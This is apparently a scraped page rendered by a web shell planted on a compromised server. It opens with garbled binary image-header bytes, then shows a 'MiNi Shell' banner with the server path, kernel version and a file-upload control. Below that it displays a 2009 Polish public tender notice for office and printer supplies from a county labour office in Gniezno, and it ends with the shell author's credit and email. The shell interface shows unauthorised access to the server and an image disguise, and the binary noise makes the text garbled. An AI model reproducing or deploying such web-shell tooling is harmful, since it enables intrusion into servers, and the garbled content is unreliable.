JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/50758-N-2009.html

<p class="kh_header"><b>Gniezno: Zadanie 1
Dostawa materiałów papierniczych do sprzętu drukarskiego i urządzeń kserograficznych oraz artykułów biurowych w tym: koperty, artykuły z tworzywa sztucznego, materiały bieżącego użytku i artykuły specjalistycznego przeznaczenia.
Zadanie 2
Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek i faksu.</b><br>
<b>Numer ogłoszenia: 50758 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sobieskiego 20, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4261649, faks 061 4261162.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1
Dostawa materiałów papierniczych do sprzętu drukarskiego i urządzeń kserograficznych oraz artykułów biurowych w tym: koperty, artykuły z tworzywa sztucznego, materiały bieżącego użytku i artykuły specjalistycznego przeznaczenia.
Zadanie 2
Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek i faksu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia w zakresie zadania nr 1 dotyczy: 
sukcesywnej dostawy materiałów papierniczych do sprzętu drukarskiego i urządzeń kserograficznych oraz artykułów biurowych w tym: koperty, artykuły z tworzywa sztucznego, materiały bieżącego użytku i artykuły specjalistycznego przeznaczenia wyszczególnionych w załączniku nr 4 do SIWZ. 

2. Przedmiot zamówienia w zakresie zadania nr 2 dotyczy: 
sukcesywnej dostawy materiałów eksploatacyjnych do drukarek, kserokopiarek i faksu wymienionych w załączniku nr 5 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.20.00-1, 30.12.51.10-5, 30.12.51.20-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:  
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.  
2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się wykonawców, którzy:  
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4. 
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych. 
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji. 
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.  
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych. 
2.6 nie zgodzili się na przedłużenie okresu związania ofertą   
3. Zamawiający odrzuca ofertę jeżeli:  
3.1 jest niezgodna z ustawą 
3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 
3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji  
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,   
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia. 
3.6 zawiera błędy w obliczeniu ceny  
3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych  3.8 jest nieważna na podstawie odrębnych przepisów,  
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą  
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.  
6. Ocena ofert w zakresie poszczególnych zadań będzie niezależna od siebie. Odrzucenie oferty Wykonawcy w zakresie jednego zadania nie powoduje automatycznie odrzucenia jego oferty w zakresie innego zadania. 
7. Wykonawcy mogą wspólnie ubiegać się o zamówienie na zasadach określonych w art. 23 ustawy Pzp. Wówczas Zamawiający dokona oceny spełnienia warunków traktując łączne ich spełnienie przez wykonawców, którzy wspólnie ubiegają się o zamówienie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:   
A.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert i nie później niż w dniu upływu składania ofert.  
A.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.   
A.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert i nie później niż w dniu składania ofert.   A.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych załącznik nr 3 do SIWZ.    
B. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:   
B.1) Wykaz wykonanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Na potwierdzenie niezbędnej wiedzy i doświadczenia wykonawcy winni wykazać, że w czasie określonym wyżej w punkcie B.1, wykonywali co najmniej jedną dostawę odpowiadające wartością i zakresem niniejszego przedmiotu zamówienia. Załącznik nr 7 do SIWZ  
C. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:  
C.1) Zamiast dokumentów, o których mowa w pkt. A.1), A.3),  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert i nie później niż w dniu upływu składania ofert. 
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert i nie później niż w dniu upływu składania ofert. 
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   - Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. C zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. C.     D. Dokumenty wymagane w przypadku składania oferty wspólnej:             
D.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Wszelka korespondencja będzie prowadzona z Pełnomocnikiem. 
D.2 Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. A, C dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie
D.3 Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed zawarciem umowy o niniejsze zamówienie, mogą zostać wezwani przez Zamawiającego do przedstawienia stosownej umowy regulującej współpracę tych Wykonawców.     
E. Ponadto na ofertę składają się następujące dokumenty i załączniki:

E.1 Formularz ofertowy - załącznik 1 lub 2 ( w zależności od składanej oferty)
E.2 Kosztorys ofertowy do zadania nr 1 - załącznik nr 4
E.3 Kosztorys ofertowy do zadania nr 2 - załącznik nr 5 wraz z dokumentami wymienionymi  w opisie przedmiotu zamówienia w pkt. 2.1 oraz oświadczeniem załącznik nr 6 do SIWZ w przypadku zaproponowania tonerów równoważnych.
E.4 Wykaz wykonywanych dostaw - załącznik nr 7
E.5 Oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy Pzp. - załącznik nr 3

F. Postanowienia dotyczące składanych dokumentów 
F.1 Wyżej wymienione dokumenty w punkcie A, C, mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem. Wykonawca zobowiązany jest do przedstawienia dokumentów  zawierających stwierdzenia zgodne z faktami i stanem prawnym istniejącym w chwili ich składania, tzn. wystawione w takim okresie, który został  określony w pkt. A i C i nie później niż w dniu upływu terminu składania ofert.
F.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup-gniezno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-gniezno.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 11:45, miejsce: Powiatowy Urząd Pracy w Gnieźnie ul. Sobieskiego 20, 62-200 Gniezno - biuro podawcze pokój nr 18.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 18.04.2009.</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów papierniczych do sprzętu drukarskiego i urządzeń kserograficznych oraz artykułów biurowych w tym: koperty, artykuły z tworzywa sztucznego, materiały bieżącego użytku i artykuły specjalistycznego przeznaczenia..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 1 dotyczy: 
sukcesywnej dostawy materiałów papierniczych do sprzętu drukarskiego i urządzeń kserograficznych oraz artykułów biurowych w tym: koperty, artykuły z tworzywa sztucznego, materiały bieżącego użytku i artykuły specjalistycznego przeznaczenia wyszczególnionych w załączniku nr 4 do SIWZ. 1.1 Termin wykonania zamówienia: w terminie 5 dni od podpisania umowy sukcesywna dostawa w/w przedmiotu zamówienia do dnia 31.12.2009 r.
1.2 Dostawy realizowane będą w zależności od potrzeb Zamawiającego na zlecenie telefoniczne potwierdzone drogą faksową lub e-mailową. 1.3 Dostawy muszą być realizowane w godzinach pracy Powiatowego Urzędu Pracy w Gnieźnie w terminie 3 dni od daty złożenia zamówienia. 1.4 Wykonawca zapewni transport, rozładowanie i wniesienie zamówionych artykułów papierniczych i biurowych do magazynu Powiatowego Urzędu Pracy, który mieści się w budynku położonym w Gnieźnie, przy ul. Sobieskiego 20 (parter). Dostarczone materiały powinny być spakowane w taki sposób aby nie uległy zniszczeniu podczas transportu rozładunku i wniesienia do magazynu.
1.5 W okresie objętym umową, Wykonawca zapewni stałą wysokość cen jednostkowych dostarczanych artykułów biurowych i materiałów papierniczych, zgodnie z przedłożoną ofertą..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek i faksu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 2 dotyczy: 
sukcesywnej dostawy materiałów eksploatacyjnych do drukarek, kserokopiarek i faksu wymienionych w załączniku nr 5 do SIWZ.
Zamawiający dopuszcza oferty równoważne. 

Wymagania dotyczące przedmiotu zamówienia i realizacji zamówienia.

2.1 Materiały eksploatacyjne muszą być fabrycznie nowe, nieużywane, wolne od wad, kompletne, do których produkcji użyto 100 % materiałów nowych, bez śladów używania i uszkodzenia, pełnowartościowe, nieregenerowane, nierefabrykowane, wyprodukowane przez producenta sprzętu, do którego są przeznaczone, posiadającego normę ISO 9001. Wszystkie elementy wchodzące w skład materiałów (np. kaseta, bęben światłoczuły, listwa podająca, listwa zbierająca, listwa czyszcząca, wałek grzewczy, wałek dociskowy, głowica drukująca, toner, atrament, tusz itp.) będą fabrycznie nowe, nieregenerowane, nierefabrykowane, niewchodzące wcześniej (pierwotnie) w całości ani w części w skład innych materiałów, które zastosowane w urządzeniach firm wymienionych w powyższym zestawieniu nie spowodują utraty gwarancji producenta tych urządzeń. Jeżeli potencjalni wykonawcy zaoferują tonery producentów innych niż producenci urządzeń określonych w załączniku nr 5 ( tzw. równoważne), zobowiązani są do oferty dołączyć oświadczenia producentów tych materiałów eksploatacyjnych (w przypadku materiałów produkcji krajowej) względnie głównego dystrybutora na Polskę (w przypadku materiałów produkcji zagranicznej), w których będą znajdować się informacje potwierdzające, że użyte materiały, a więc listwy, wałki, a zwłaszcza kasety wykorzystane do ich produkcji nie pochodzą z regeneracji, a więc nie są one wytwarzane z elementów użytych powtórnie w procesie produkcji oraz załączą dodatkowo oświadczenia od producentów urządzeń, z treści których będzie wynikało, że zastosowanie zaoferowanych przez wykonawcę materiałów eksploatacyjnych nie spowoduje utraty gwarancji producenta. Oświadczenia muszą być oryginalne,podpisane przez producenta i aktualne. Przez definicję utrata gwarancji producenta Zamawiający rozumie, sytuację utraty przez Zamawiającego prawa do dokonania nieodpłatnej naprawy urządzenia w okresie gwarancji, jak i ewentualną utratę gwarancji na całe urządzenie, czyli tzw. wygaśnięcie ochrony gwarancyjnej
2.2 Przez równoważne materiały eksploatacyjne Zamawiający rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądź lepszych (pojemność tuszu/toneru, wydajność i jakość wydruku - wykonane zgodnie ze standardem odpowiednio ISO/IEC 19752, ISO/IEC 24711 - oświadczenie według wzoru stanowiącego załącznik nr 6 do SIWZ) w stosunku do typu zamawianego produktu oryginalnego, fabrycznie nowego, nieregenerowanego, pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony. Materiały równoważne muszą działać analogicznie jak materiały oryginalne producenta urządzeń i posiadać elementy elektroniczne, dające komunikaty o stanie ich zużycia, jak również ich zastosowanie nie może naruszać warunków gwarancji urządzenia, do którego dany materiał został użyty. 
2.3 Dostarczone przez Wykonawcę materiały eksploatacyjne muszą pochodzić z bieżącej produkcji i muszą być umieszczone w oryginalnych opakowaniach fabrycznych, z etykietami w języku polskim,  muszą posiadać znak firmowy producenta, etykiety zawierające numer katalogowy, termin jego ważności i listę kompatybilności. Dostarczone materiały muszą posiadać 12 miesięczny okres gwarancji, licząc od dnia dostawy.
2.4 Zamawiający przedstawił minimalne parametry materiałów eksploatacyjnych do drukarek i faksów, które spełniałyby założone wymagania techniczne, jakościowe, funkcjonalne i użytkowe. Zamawiający podał zalecane przez producenta typy produktów do posiadanych urządzeń. Wykonawca w swojej ofercie może zaoferować ceny tych konkretnych produktów lub innych, ale muszą one być równoważne jakościowo, czyli nie gorsze od zaproponowanych przez Zamawiającego w SIWZ. W przypadku gorszych parametrów technicznych, jakościowych, funkcjonalnych i użytkowych przedmiotu zamówienia oferta Wykonawcy zostanie odrzucona z postępowania.
2.5 Wszystkie materiały eksploatacyjne muszą być zgodne z normami i gwarancjami producentów odpowiednich drukarek i faksów.
2.6 Termin wykonania zamówienia: w terminie 5 dni od podpisania umowy sukcesywna dostawa do 31.12.2009 r.
2.7 Dostawy realizowane będą w zależności od potrzeb Zamawiającego na zlecenie telefoniczne potwierdzone drogą faksową lub e-mailową. 2.7 Dostawy muszą być realizowane w godzinach pracy Powiatowego Urzędu Pracy w Gnieźnie w terminie 3 dni od daty złożenia zamówienia. 2.8 Wykonawca zapewni transport, rozładowanie i wniesienie zamówionych materiałów eksploatacyjnych do drukarek, kserokopiarek i faksu do magazynu Powiatowego Urzędu Pracy, który mieści się w budynku położonym w Gnieźnie, przy ul. Sobieskiego 20. Dostarczone materiały powinny być spakowane w taki sposób aby nie uległy zniszczeniu podczas transportu i rozładunku i wniesienia do magazynu. 2.9 W okresie objętym umową, Wykonawca zapewni stałą wysokość cen jednostkowych dostarczanych materiałów eksploatacyjnych do drukarek, kserokopiarek, zgodnie z przedłożoną ofertą..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com